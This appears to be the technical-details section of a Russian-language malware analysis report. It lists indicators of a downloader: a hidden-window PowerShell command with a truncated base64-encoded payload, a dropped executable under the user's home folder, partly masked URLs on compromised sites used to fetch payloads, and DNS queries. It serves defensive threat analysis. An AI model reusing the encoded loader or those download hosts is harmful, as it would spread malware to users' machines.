Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABLAGIANwBoADcAeQAyAD0AKAAnAEsANQAnACsAKAAnAHUAaQBiADQAJwArACcAOAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBTAGUAcgBQAHIAbwBmAEkATA...
- %HOMEPATH%\yg9k_9t\oad70ds\xagna69y8.exe
- %HOMEPATH%\yg9k_9t\oad70ds\xagna69y8.exe
- 'ie###acts.com':80
- http://fu#######ntentertainment.com/cgi-bin/WrD/
- http://vi###ohomem.com/wp-content/O2ir3vx/
- http://an####icscosm.com/cgi-bin/PwlMy/
- http://an####icscosm.com/cgi-sys/suspendedpage.cgi
- http://www.an###thinh.com/wp-admin/KpNfK/
- http://tw###rrot.com/wp-includes/s7aGv/
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
- DNS ASK fu#######ntentertainment.com
- DNS ASK ge#####mmigration.com
- DNS ASK vi###ohomem.com
- DNS ASK an####icscosm.com
- DNS ASK an###thinh.com
- DNS ASK tw###rrot.com
- DNS ASK cr#.#ectigo.com
- DNS ASK ie###acts.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABLAGIANwBoADcAeQAyAD0AKAAnAEsANQAnACsAKAAnAHUAaQBiADQAJwArACcAOAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBTAGUAcgBQAHIAbwBmAEkATA...' (со скрытым окном)